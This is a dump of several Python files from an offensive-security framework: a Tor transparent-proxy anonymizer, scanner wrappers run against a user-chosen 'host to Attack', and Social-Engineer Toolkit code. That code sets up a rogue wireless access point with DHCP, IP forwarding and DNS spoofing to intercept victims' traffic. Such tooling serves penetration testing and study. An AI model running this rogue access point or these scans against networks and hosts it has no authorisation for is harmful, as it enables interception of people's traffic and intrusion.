return subprocess.Popen(r"iptables-save | grep '^\-' | wc -l", stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=shell).communicate()
def firewall():
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Backing up Iptables.. {bcolors.BLUE} ]{bcolors.ENDC}")
firewall_green, firewall_red = check_default_rules()
if firewall_red:
print(f"{bcolors.RED}\nCan't execute {bcolors.BLUE}iptables-save{bcolors.ENDC}. see the reson below.\n{bcolors.RED}{bcolors.BOLD}{firewall_red.decode('utf-8')}{bcolors.ENDC}")
sys.exit()
if firewall_green.strip() == b'0':
print(f" {bcolors.BLUE}default rules are configured, skipping..")
else:
proc = subprocess.Popen('iptables-save > /etc/iptables_rules_vanish.bak', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
outp, error = proc.communicate()
if error and b'Warning:' not in error:
print(f"{bcolors.RED}\nCan't seem to save the iptables_bakup file in /etc.\n{error.decode('utf-8')}")
sys.exit()
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.YELLOW}location: /etc/iptables_rules_vanish.bak {bcolors.BLUE} ]{bcolors.ENDC}")
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
inn_out_rules = '''
### Set variables
# The UID that Tor runs as (varies from system to system)
_tor_uid=`id -u debian-tor` #Debian/Ubuntu
# Tor's TransPort
_trans_port="9040"
# Tor's DNSPort
_dns_port="5353"
# Tor's VirtualAddrNetworkIPv4
_virt_addr="10.192.0.0/10"
# LAN destinations that shouldn't be routed through Tor
_non_tor="127.0.0.0/8 10.0.0.0/8 172.16.0.0/12 192.168.0.0/16"
# Other IANA reserved blocks (These are not processed by tor and dropped by default)
_resv_iana="0.0.0.0/8 100.64.0.0/10 169.254.0.0/16 192.0.0.0/24 192.0.2.0/24 192.88.99.0/24 198.18.0.0/15 198.51.100.0/24 203.0.113.0/24 224.0.0.0/4 240.0.0.0/4 255.255.255.255/32"
# Flushing existing Iptables Chains/Firewall rules #
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
iptables -F
iptables -X
iptables -Z
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -t raw -F
iptables -t raw -X
### *nat OUTPUT (For local redirection)
# nat .onion addresses
iptables -t nat -A OUTPUT -d $_virt_addr -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports $_trans_port
# nat dns requests to Tor
iptables -t nat -A OUTPUT -d 127.0.0.1/32 -p udp -m udp --dport 53 -j REDIRECT --to-ports $_dns_port -m comment --comment "vanish_triggered"
# Don't nat the Tor process, the loopback, or the local network
iptables -t nat -A OUTPUT -m owner --uid-owner $_tor_uid -j RETURN
iptables -t nat -A OUTPUT -o lo -j RETURN
# Allow lan access for hosts in $_non_tor and $_resv_ina
# This is to make sure that this local addresses don't get dropped.
for _lan in $_non_tor; do
iptables -t nat -A OUTPUT -d $_lan -j RETURN
done
for _iana in $_resv_iana; do
iptables -t nat -A OUTPUT -d $_iana -j RETURN
done
# Redirect all other pre-routing and output to Tor's TransPort
iptables -t nat -A OUTPUT -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -j REDIRECT --to-ports $_trans_port
### *filter INPUT
iptables -A INPUT -m state --state ESTABLISHED -j ACCEPT
iptables -A INPUT -i lo -j ACCEPT
# Log & Drop everything else. Uncomment to enable logging
#iptables -A INPUT -j LOG --log-prefix "Dropped INPUT packet: " --log-level 7 --log-uid
iptables -A INPUT -j DROP
### *filter FORWARD
iptables -A FORWARD -j DROP
### Fix for possible kernel packet-leak as discussed in,
### https://lists.torproject.org/pipermail/tor-talk/2014-March/032507.html
### uncomment below lines to log dropped packets
iptables -A OUTPUT -m conntrack --ctstate INVALID -j DROP
# iptables -A OUTPUT -m state --state INVALID -j LOG --log-prefix "Transproxy state leak blocked: " --log-uid
iptables -A OUTPUT -m state --state INVALID -j DROP
### *filter OUTPUT
iptables -A OUTPUT -m state --state ESTABLISHED -j ACCEPT
# Allow Tor process output
iptables -A OUTPUT -m owner --uid-owner $_tor_uid -p tcp -m tcp --tcp-flags FIN,SYN,RST,ACK SYN -m state --state NEW -j ACCEPT
# Allow loopback output
iptables -A OUTPUT -d 127.0.0.1/32 -o lo -j ACCEPT
# Tor transproxy magic
iptables -A OUTPUT -d 127.0.0.1/32 -p tcp -m tcp --dport $_trans_port --tcp-flags FIN,SYN,RST,ACK SYN -j ACCEPT
# Drop everything else.
iptables -A OUTPUT -j DROP
### Set default policies to DROP
iptables -P INPUT DROP
iptables -P FORWARD DROP
iptables -P OUTPUT DROP
'''
print(f"{bcolors.BLUE} [ {bcolors.YELLOW} Backing up Iptables.. {bcolors.BLUE} ]{bcolors.ENDC}")
process5 = subprocess.Popen('/bin/bash', stdin=subprocess.PIPE, stdout=open(os.devnull, 'wb'), stderr=subprocess.PIPE)
out5, err5 = process5.communicate(inn_out_rules.encode('utf-8'))
if err5:
print('\n' + color() + err5.decode('utf8').strip() + bcolors.ENDC)
print("""There's something strange with your system
It doesn't let me change the iptable rules""")
sys.exit()
time.sleep(1.2)
print(f"{bcolors.BLUE} [ {bcolors.CYAN} {bcolors.GREEN} [ ✔ ] {bcolors.BLUE} ]{bcolors.ENDC}")
def reset_to_default(reset_trigger: int = 0, overide_pass: bool = False, reset_as_child_func: bool = False, nuke_sanity: bool = False):
if not overide_pass:
        if reset_trigger > 7: sys.exit(f"{bcolors.RED}too many invalid answers, exiting.{bcolors.ENDC}")
reset_consent = input(f"{color()}\nThis will overwrite all of your existing rules {bcolors.GREEN}Y(do it){bcolors.ENDC}/{bcolors.RED}N(exit){bcolors.ENDC}: ").lower()
if reset_consent == 'y': pass
elif reset_consent == 'n': sys.exit(f"{bcolors.RED}Copy that..\n{bcolors.ENDC}")
else:
reset_trigger += 1
return reset_to_default(reset_trigger=reset_trigger)
time.sleep(1)
print(f'{PURPLE}Backing up current rules, just in case..{bcolors.ENDC}')
default_check_green, default_check_red = check_default_rules()
if default_check_red:
print(f"{bcolors.RED}Error while checking existing rules; {orange}exiting..\n{yellow}Error message: {color()}{default_check_red.decode('utf-8')}{bcolors.ENDC}")
sys.exit()
if default_check_green.strip() != b'0':
file_name_id = time.strftime("%m_%d_%Y-%H:%M:%S", time.localtime())
proc = subprocess.Popen(f'sudo iptables-save > /tmp/iptables_{file_name_id}.rules', stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
outp, error = proc.communicate()
if error and b'Warning:' not in error:
print(f"{bcolors.RED}\nCan't seem to save the iptables_bakup file in /tmp directory.\n{error.decode('utf-8')}")
sys.exit()
print(f"{bcolors.CYAN}Saved in {bcolors.BLUE}/tmp{bcolors.ENDC} as {bcolors.RED}iptables_{file_name_id}.rules{bcolors.ENDC}", end='\n\n')
else:
print(f"{bcolors.CYAN} Default rules are set, backup not required :){bcolors.ENDC}", end= "\n")
nuke_sanity = True
    if not nuke_sanity:
        print(bcolors.GREEN + bcolors.BOLD + 'Resetting Iptables' + bcolors.ENDC)
    else:
        print(f"{bcolors.CYAN}{bcolors.BOLD}I'm nuking everything just for sanity{bcolors.ENDC}")
iptables_rules = '''
# Accepting all traffic first#
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT
# Flushing All Iptables Chains/Firewall rules #
iptables -F
# Deleting all Iptables Chains #
iptables -X
# Flushing all counters too #
iptables -Z
# Flush and delete all nat and mangle #
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -t raw -F
iptables -t raw -X
'''
process = subprocess.Popen(
'/bin/bash', stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
out, err = process.communicate(iptables_rules.encode('utf-8'))
time.sleep(0.5)
if err:
print(color() + "Can't reset Iptables")
print(color() + '\n' + err.decode('utf8').strip() + bcolors.ENDC)
sys.exit()
if reset_as_child_func:
pass
else:
print(f"{bcolors.BLUE} Successfully reset Iptables to default :)")
return 0
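# Illustrative sketch (added here for reference, never called by the tool): a
# backup written by reset_to_default() to /tmp can be re-applied later with
# iptables-restore. The helper name and its argument are assumptions.
def restore_backup(backup_path: str):
    with open(backup_path) as rules:
        subprocess.run(['iptables-restore'], stdin=rules, check=True)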
def usage():
print(color() + """
__ _____ _____ _ _
__| |___ ___ _ _ ___| | | |___|_|___| |_
| | | -_|_ -| | |_ -| --| | _| |_ -| _|
|_____|___|___|___|___|_____|__|__|_| |_|___|_|
loves you.\n""" + bcolors.ENDC)
print(bcolors.ENDC + " -{ " + bcolors.GREEN + bcolors.UNDERL + "For God so loved the world, that he gave His." + bcolors.ENDC + color() + " [John 3:16] " + bcolors.ENDC + "}- " + bcolors.ENDC)
print(bcolors.BLUE + "\n -{" + bcolors.ENDC + bcolors.UNDERL + " Use Options from the table below" + bcolors.ENDC + bcolors.BLUE + " }-\n" + bcolors.ENDC)
print(bcolors.BLUE + " [ -h show this help message and exit ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -m start anonymizing ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -e get back to the surface-web ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -i check current IP address ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -s connect to a different exit-node ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -w check if using tor ] " + bcolors.ENDC)
print(bcolors.BLUE + " [ -n back up & resets Iptables to default ] " + bcolors.ENDC)
arg = sys.argv[1:]
args = {"proxy": ["-m"], "surface":["-e"], "identity":["-i"], "scramble": ["-s"], "cover": ['-w'], "revert_tables": ["-n"], "help": ["-h", "--help"]}
if len(arg) != 1:
print(bcolors.BLUE + "\n -{" + bcolors.RED + " I need an argument: eg -m or -e, use -h/--help for usage " + bcolors.ENDC + bcolors.BLUE + " }-\n" + bcolors.ENDC)
usage()
elif sys.argv[1].lower() in args['proxy']:
sudo()
logo("sleep")
configure()
firewall()
tor_stat(0)
elif sys.argv[1].lower() in args['surface']:
sudo()
logo("sleep")
terminate()
elif sys.argv[1].lower() in args['identity']:
logo()
print('\n' + bcolors.GREEN + 'your ip is: ' + bcolors.ENDC + color() + mask() + bcolors.ENDC)
elif sys.argv[1].lower() in args['scramble']:
sudo()
logo("sleep")
torcircuit()
elif sys.argv[1].lower() in args['cover']:
logo()
tor_stat(0)
elif sys.argv[1].lower() in args['revert_tables']:
sudo()
logo("sleep")
reset_to_default()
elif sys.argv[1].lower() in args['help']:
usage()
else:
print(
f"\n{color(bcolors.BLUE)} -[ {color(bcolors.GREEN)}{sys.argv[1]}!{color(bcolors.BLUE)} isn't a valid trigger. ]-{bcolors.ENDC}")
usage()
| 29,640 | Python | .py | 534 | 44.035581 | 266 | 0.556712 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,858 | secmon.py | CHEGEBB_africana-framework/modules/secmon.py | import subprocess
from src.core.bcolors import *
class pproxy_mon(object):
def __init__(self):
pass
def pproxy(self):
print(bcolors.RED + "\n Part of africana-framework" + bcolors.ENDC)
print(bcolors.RED + " Your internet proxy connections routes\n" + bcolors.ENDC)
print(bcolors.BLUE + " Copy & Paste " + bcolors.RED + "-> " + bcolors.YELLOW + "tail -f /var/log/privoxy/logfile " + bcolors.BLUE + "To see Your Logs" + bcolors.ENDC)
print(bcolors.BLUE + " Launch attack using port 8888 " + bcolors.RED + "ex. " + bcolors.GREEN + "sqlmap --proxy=http://127.0.0.1:8888" + bcolors.ENDC)
print(bcolors.BLUE + "\n -[ Your Proxy Chains ]-\n" + bcolors.ENDC)
print(bcolors.GREEN + " ( Local " + bcolors.RED + "> " + bcolors.YELLOW + "8888 " + bcolors.RED + "> " + bcolors.GREEN + "Squid " + bcolors.YELLOW + "3218 " + bcolors.RED + "> " + bcolors.GREEN + "Privoxy " + bcolors.RED + "> " + bcolors.YELLOW + "8118 " + bcolors.RED + "> " + bcolors.GREEN + "Tor " + bcolors.YELLOW + "9050 " + bcolors.RED + "> " + bcolors.GREEN + "web )\n" + bcolors.ENDC)
process = subprocess.Popen('pproxy -r http://localhost:3128 -l http://localhost:8888 -v', shell = True).wait()
sec_mon = pproxy_mon()
if __name__ == '__main__':
    sec_mon.pproxy()
| 1,368 | Python | .py | 16 | 79.375 | 401 | 0.58963 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,859 | kenyan.py | CHEGEBB_africana-framework/modules/kenyan.py | #!/usr/bin/env python3
import os
import sys
class africana(object):
def __init__(self):
os.chdir('/usr/local/opt/africana-framework/')
os.system('python3 africana.py')
main = africana()
if __name__ == '__main__':
    sys.exit(0)
| 265 | Python | .py | 10 | 22.3 | 54 | 0.616601 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,860 | info.py | CHEGEBB_africana-framework/guide/info.py | import sys
import time
from src.core.bcolors import *
class guide_inf(object):
def __init__(self):
pass
def guide(self):
with open('./guide/guide.txt', 'r') as guide:
for line in guide:
sys.stdout.write(bcolors.GREEN + line + bcolors.ENDC)
sys.stdout.flush()
time.sleep(0.0)
guide_info = guide_inf()
if __name__ == '__main__':
    sys.exit(guide_info.guide())
| 447 | Python | .py | 15 | 22.533333 | 69 | 0.560465 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,861 | africana.py | CHEGEBB_africana-framework/source/africana.py | #!/usr/bin/env python3
import os
import sys
import time
import subprocess
def check_os():
    # default to "posix" so the return value is always defined
    operating_system = "posix"
    if os.name == "nt":
        operating_system = "windows"
    return operating_system
if check_os() == "posix":
class bcolors:
PURPLE = '\033[95m'
CYAN = '\033[96m'
DARKCYAN = '\033[36m'
BLUE = '\033[94m'
GREEN = '\033[92m'
YELLOW = '\033[93m'
RED = '\033[91m'
BOLD = '\033[1m'
UNDERL = '\033[4m'
ENDC = '\033[0m'
backBlack = '\033[40m'
backRed = '\033[41m'
backGreen = '\033[42m'
backYellow = '\033[43m'
backBlue = '\033[44m'
backMagenta = '\033[45m'
backCyan = '\033[46m'
backWhite = '\033[47m'
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
else:
class bcolors:
PURPLE = ''
CYAN = ''
DARKCYAN = ''
BLUE = ''
GREEN = ''
YELLOW = ''
RED = ''
BOLD = ''
UNDERL = ''
ENDC = ''
backBlack = ''
backRed = ''
backGreen = ''
backYellow = ''
backBlue = ''
backMagenta = ''
backCyan = ''
backWhite = ''
def disable(self):
self.PURPLE = ''
self.CYAN = ''
self.BLUE = ''
self.GREEN = ''
self.YELLOW = ''
self.RED = ''
self.ENDC = ''
self.BOLD = ''
self.UNDERL = ''
self.backBlack = ''
self.backRed = ''
self.backGreen = ''
self.backYellow = ''
self.backBlue = ''
self.backMagenta = ''
self.backCyan = ''
self.backWhite = ''
self.DARKCYAN = ''
class main(object):
def __init__(self):
pass
def intro_banner(self):
print(bcolors.GREEN + bcolors.BOLD + " \nHey U! Jesus Is @ the door Knocking. Do Something. " + bcolors.ENDC)
print(bcolors.GREEN + bcolors.BOLD + """
wake up, Christian
Lord God Jesus Christ L❤️.VE'S you
follow the white Pigeon.
knock, knock, knock,
Man Of God.""" + bcolors.ENDC)
start = r'''
(`. ,-,
` `. ,;' /
`. ,'/ .'
`. X /.'
.-;--''--.._` ` (
.' / `
, ` ' Q '
, , `._ \
,.| ' `-.;_' '
: . ` ; ` ` --,.._;
' ` , ) .'
`._ , ' /_
; ,''-,;' ``- [By: r0jahsm0ntar1]
``-..__``--` [God is True ❤️. John 3:16]'''
for s in start:
sys.stdout.write(s)
sys.stdout.flush()
time.sleep(0.001)
def attacker_banner(self):
print(bcolors.GREEN + bcolors.BOLD + """
.,'
.''.'
.' .'
_.ood0Pp._ ,' `.~ .q?00doo._
.od00Pd0000Pdb._. . _:db?000b?000bo.
.?000Pd0000Pd0000PdbMb?0000b?000b?0000b.
.d0000Pd0000Pd0000Pd0000b?0000b?000b?0000b.
d0000Pd0000Pd00000Pd0000b?00000b?0000b?000b.
00000Pd0000Pd0000Pd00000b?00000b?0000b?0000b
?0000b?0000b?0000b?00Pd0[Praise be to Jesus]
?0000b?0000b?0000b?00000Pd00000Pd0000Pd000P
`?0000b?0000b?0000b?0000Pd0000Pd0000Pd000P'
`?000b?0000b?000b?0000Pd000Pd0000Pd000P
`~?00b?000b?000b?000Pd00Pd000Pd00P'
`~?0b?0b?000b?0Pd0Pd000PdP~' [Christian]""" + bcolors.ENDC)
def closser_banner(self):
close = r'''
____ _
/ __ \___ __________(_)___ _____
/ /_/ / _ \/ ___/ ___/ / __ ` / __ \
/ ____/ __/ / (__ ) / /_/ // / / /
/_/ \___/_/In Serving Jesus.Defeat the Devil By: Fasting & Praying.'''
for c in close:
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(0.01)
class scanners(main):
def __init__(self, host):
self.host = host
main.attacker_banner(self)
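    # Each scan method below simply shells out to an external tool (nmap, dnsrecon,
    # whatweb, nuclei, nikto, feroxbuster); those binaries are assumed to be
    # installed and available on PATH.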
def nmap(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Nmap Scanner Has Began to find Open Ports .." + bcolors.ENDC)
process = subprocess.Popen("nmap -p- {0}".format(host), shell = True).wait()
return process
def dnsrec(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Dnsrecon has started Scanning for subdomains .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("dnsrecon -a -d {0}".format(host), shell = True).wait()
return process
def whatweb(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] WhatWeb Scanner has begun to find running technology .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("whatweb -a 3 -v {0}".format(host), shell = True).wait()
return process
def nuclei(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Nuclei Scanner has begun Vulnerbility Scanning .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("nuclei -target {0}".format(host), shell = True).wait()
return process
def nikto(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] Nikto Scanner has started Vulnerbility Scanning .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("nikto -C all -host {0}".format(host), shell = True).wait()
return process
def ferox(self, host):
print(bcolors.BLUE + bcolors.BOLD + "\n[+] FeroxBuster Scanner has started Discovering host internal files .." + bcolors.ENDC)
time.sleep(0.1)
process = subprocess.Popen("feroxbuster --url http://{0}".format(host), shell = True).wait()
return process
class Options():
def menu(self):
print(bcolors.BLUE + bcolors.BOLD +"""
[---] Choose what to do from the menu below [---]"""+ bcolors.ENDC)
print(bcolors.BLUE + """
1) Port Scanning 5) Start Nikto Scaning
2) Dns Reconning 6) Fero File Searching
3) Web Technologies 7) Automation Scanning
4) Nuclei Vuln Scanning 8) Exit Africana Tool."""+ bcolors.ENDC)
os.system('clear')
shamura = main()
shamura.intro_banner()
host = input(bcolors.RED + bcolors.BOLD + "\n\n[+] What is your host to Attack:?... ~$ "+ bcolors.ENDC)
os.system('clear')
spiders = scanners(host = '')
def select():
optio = Options()
optio.menu()
choice = input(bcolors.RED + bcolors.BOLD + "\n[+] What is Your Choice from the above table ?: " + bcolors.ENDC)
while True:
try:
if choice == '1':
os.system('clear')
return spiders.nmap(host), select()
elif choice == '2':
os.system('clear')
return spiders.dnsrec(host), select()
elif choice == '3':
os.system('clear')
return spiders.whatweb(host), select()
elif choice == '4':
os.system('clear')
return spiders.nuclei(host), select()
elif choice == '5':
os.system('clear')
return spiders.nikto(host), select()
elif choice == '6':
os.system('clear')
return spiders.ferox(host), select()
elif choice == '7':
os.system('clear')
return spiders.nmap(host), spiders.dnsrec(host), spiders.whatweb(host), spiders.nuclei(host), spiders.nikto(host), spiders.ferox(host), select()
elif choice == '8':
os.system('clear')
print(bcolors.RED + bcolors.BOLD + "\n[-] Exiting The Engine Bye and Get Saved if Not .." + bcolors.ENDC)
shamura.closser_banner()
break
else:
print(bcolors.RED + bcolors.BOLD + "\n[-] Critical Error has happened" + bcolors.ENDC)
break
except:
print(bcolors.RED + bcolors.BOLD + "\n[-] Critical Error has happened" + bcolors.ENDC)
break
select()
if __name__ == '__main__':
main()
| 8,834 | Python | .py | 236 | 27.330508 | 161 | 0.495391 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,862 | wifiattack.py | CHEGEBB_africana-framework/externals/set/src/wireless/wifiattack.py | #!/usr/bin/env python3
# coding=utf-8
##############################################
#
# This is a basic setup for an access point
# attack vector in set.
#
##############################################
import sys
import os
import subprocess
import pexpect
import time
import src.core.setcore as core
from src.core.menu import text
sys.path.append("/etc/setoolkit")
from set_config import AIRBASE_NG_PATH as airbase_path
from set_config import ACCESS_POINT_SSID as access_point
from set_config import AP_CHANNEL as ap_channel
from set_config import DNSSPOOF_PATH as dnsspoof_path
sys.path.append(core.definepath)
try: input = raw_input
except NameError: pass
if not os.path.isfile("/etc/init.d/isc-dhcp-server"):
core.print_warning("isc-dhcp-server does not appear to be installed.")
core.print_warning("apt-get install isc-dhcp-server to install it. Things may fail now.")
if not os.path.isfile(dnsspoof_path):
if os.path.isfile("/usr/sbin/dnsspoof"):
dnsspoof_path = "/usr/sbin/dnsspoof"
else:
core.print_warning("DNSSpoof was not found. Please install or correct path in set_config. Exiting....")
core.exit_set()
if not os.path.isfile(airbase_path):
airbase_path = "src/wireless/airbase-ng"
core.print_info("using SET's local airbase-ng binary")
core.print_info("For this attack to work properly, we must edit the isc-dhcp-server file to include our wireless interface.")
core.print_info("""This will allow isc-dhcp-server to properly assign IPs. (INTERFACES="at0")""")
print("")
core.print_status("SET will now launch nano to edit the file.")
core.print_status("Press ^X to exit nano and don't forget to save the updated file!")
core.print_warning("If you receive an empty file in nano, please check the path of your isc-dhcp-server file!")
core.return_continue()
subprocess.Popen("nano /etc/dhcp/dhcpd.conf", shell=True).wait()
# DHCP SERVER CONFIG HERE
dhcp_config1 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 10.0.0.0 netmask 255.255.255.0 {
range 10.0.0.100 10.0.0.254;
option domain-name-servers 8.8.8.8;
option routers 10.0.0.1;
option broadcast-address 10.0.0.255;
default-lease-time 600;
max-lease-time 7200;
}
""")
dhcp_config2 = ("""
ddns-update-style none;
authoritative;
log-facility local7;
subnet 192.168.10.0 netmask 255.255.255.0 {
range 192.168.10.100 192.168.10.254;
option domain-name-servers 8.8.8.8;
option routers 192.168.10.1;
option broadcast-address 192.168.10.255;
default-lease-time 600;
max-lease-time 7200;
}
""")
dhcptun = None
show_fakeap_dhcp_menu = core.create_menu(text.fakeap_dhcp_text, text.fakeap_dhcp_menu)
fakeap_dhcp_menu_choice = input(core.setprompt(["8"], ""))
if fakeap_dhcp_menu_choice != "":
fakeap_dhcp_menu_choice = core.check_length(fakeap_dhcp_menu_choice, 2)
# convert it to a string
fakeap_dhcp_menu_choice = str(fakeap_dhcp_menu_choice)
else:
fakeap_dhcp_menu_choice = "1"
if fakeap_dhcp_menu_choice == "1":
# writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config1)
dhcptun = 1
if fakeap_dhcp_menu_choice == "2":
# writes the dhcp server out
core.print_status("Writing the dhcp configuration file to ~/.set")
with open(os.path.join(core.userconfigpath, "dhcp.conf"), "w") as filewrite:
filewrite.write(dhcp_config2)
dhcptun = 2
if fakeap_dhcp_menu_choice == "exit":
core.exit_set()
interface = input(core.setprompt(["8"], "Enter the wireless network interface (ex. wlan0)"))
# place wifi interface into monitor mode
core.print_status("Placing card in monitor mode via airmon-ng..")
# if we have it already installed then don't use the SET one
if os.path.isfile("/usr/local/sbin/airmon-ng"):
airmonng_path = "/usr/local/sbin/airmon-ng"
else:
airmonng_path = "src/wireless/airmon-ng"
monproc = subprocess.Popen("{0} start {1} |"
"grep \"monitor mode enabled on\" |"
"cut -d\" \" -f5 |"
"sed -e \'s/)$//\'".format(airmonng_path, interface),
shell=True, stdout=subprocess.PIPE)
moniface = monproc.stdout.read().decode("utf-8").strip()
monproc.wait()
# execute modprobe tun
subprocess.Popen("modprobe tun", shell=True).wait()
# create a fake access point
core.print_status("Spawning airbase-ng in a separate child thread...")
child = pexpect.spawn('{0} -P -C 20 -e "{1}" -c {2} {3}'.format(airbase_path, access_point, ap_channel, moniface))
core.print_info("Sleeping 15 seconds waiting for airbase-ng to complete...")
time.sleep(15)
# bring the interface up
if dhcptun == 1:
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 10.0.0.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1", shell=True).wait()
if dhcptun == 2:
core.print_status("Bringing up the access point interface...")
subprocess.Popen("ifconfig at0 up", shell=True).wait()
subprocess.Popen("ifconfig at0 192.168.10.1 netmask 255.255.255.0", shell=True).wait()
subprocess.Popen("ifconfig at0 mtu 1400", shell=True).wait()
subprocess.Popen("route add -net 192.168.10.0 netmask 255.255.255.0 gw 192.168.10.1", shell=True).wait()
# starts a dhcp server
core.print_status("Starting the DHCP server on a separate child thread...")
child2 = pexpect.spawn("service isc-dhcp-server start")
# starts ip_forwarding
core.print_status("Starting IP Forwarding...")
child3 = pexpect.spawn("echo 1 > /proc/sys/net/ipv4/ip_forward")
# start dnsspoof
core.print_status("Starting DNSSpoof in a separate child thread...")
child4 = pexpect.spawn("{0} -i at0".format(dnsspoof_path))
core.print_status("SET has finished creating the attack. If you experienced issues please report them.")
core.print_status("Now launch SET attack vectors within the menus and have a victim connect via wireless.")
core.print_status("Be sure to come back to this menu to stop the services once your finished.")
core.return_continue()
| 6,339 | Python | .tac | 141 | 41.503546 | 125 | 0.709819 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,863 | stop_wifiattack.py | CHEGEBB_africana-framework/externals/set/src/wireless/stop_wifiattack.py | #!/usr/bin/env python3
# coding=utf-8
import subprocess
import src.core.setcore as core
#
# Simple python script to kill things created by the SET wifi attack vector
#
try: input = raw_input
except NameError: pass
interface = input(core.setprompt(["8"], "Enter your wireless interface (ex: wlan0): "))
# fix a bug if present
core.print_status("Attempting to set rfkill to unblock all if RTL is in use. Ignore errors on this.")
subprocess.Popen("rmmod rtl8187;"
"rfkill block all;"
"rfkill unblock all;"
"modprobe rtl8187;"
"rfkill unblock all;"
"ifconfig {0} up".format(interface),
shell=True).wait()
core.print_status("Killing airbase-ng...")
subprocess.Popen("killall airbase-ng", shell=True).wait()
core.print_status("Killing dhcpd3 and dhclient3...")
subprocess.Popen("killall dhcpd3", shell=True).wait()
subprocess.Popen("killall dhclient3", shell=True).wait()
core.print_status("Killing dnsspoof...")
subprocess.Popen("killall dnsspoof", shell=True).wait()
core.print_status("Turning off IP_forwarding...")
subprocess.Popen("echo 0 > /proc/sys/net/ipv4/ip_forward", shell=True).wait()
core.print_status("Killing monitor mode on mon0...")
subprocess.Popen("src/wireless/airmon-ng stop mon0", shell=True).wait()
core.print_status("Turning off monitor mode on wlan0...")
subprocess.Popen("src/wireless/airmon-ng stop wlan0", shell=True).wait()
core.print_status("SET has stopped the wireless access point. ")
core.return_continue()
| 1,549 | Python | .tac | 34 | 41.205882 | 101 | 0.713906 | CHEGEBB/africana-framework | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,285,864 | multiattack.py | CHEGEBB_africana-framework/externals/set/src/webattack/multi_attack/multiattack.py | #!/usr/bin/env python3
import re
import sys
import os
import subprocess
import time
import signal
# Grab the central imports
definepath = os.getcwd()
sys.path.append(definepath)
from src.core.setcore import *
operating_system = check_os()
me = mod_name()
#######################################################
# Here's the brains behind the multiattack vector.
# This preps each check and payload for each attack
# vector.
#######################################################
def return_menu():
print_status("Option added. You may select additional vectors")
time.sleep(2)
print("""\nSelect which additional attacks you want to use:\n""")
# option designators needed to ensure its defined ahead of time
java_applet = "off"
meta_attack = "off"
harvester = "off"
tabnabbing = "off"
mlitm = "off"
webjacking = "off"
# turning flag on
def flag_on(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.GREEN + "ON" + bcolors.ENDC)
# turning flag off
def flag_off(vector):
print_info("Turning the %s Attack Vector to " %
(vector) + bcolors.RED + "OFF" + bcolors.ENDC)
# filewriting
def write_file(filename, results):
filewrite = open(userconfigpath + "%s" % (filename), "w")
filewrite.write(results)
filewrite.close()
# specify attackvector
filewrite = open(userconfigpath + "attack_vector", "w")
filewrite.write("multiattack")
filewrite.close()
# on and off switch detection variable
trigger = ""
# set toggle flags here
toggleflag_java = (bcolors.RED + " (OFF)" + bcolors.ENDC)
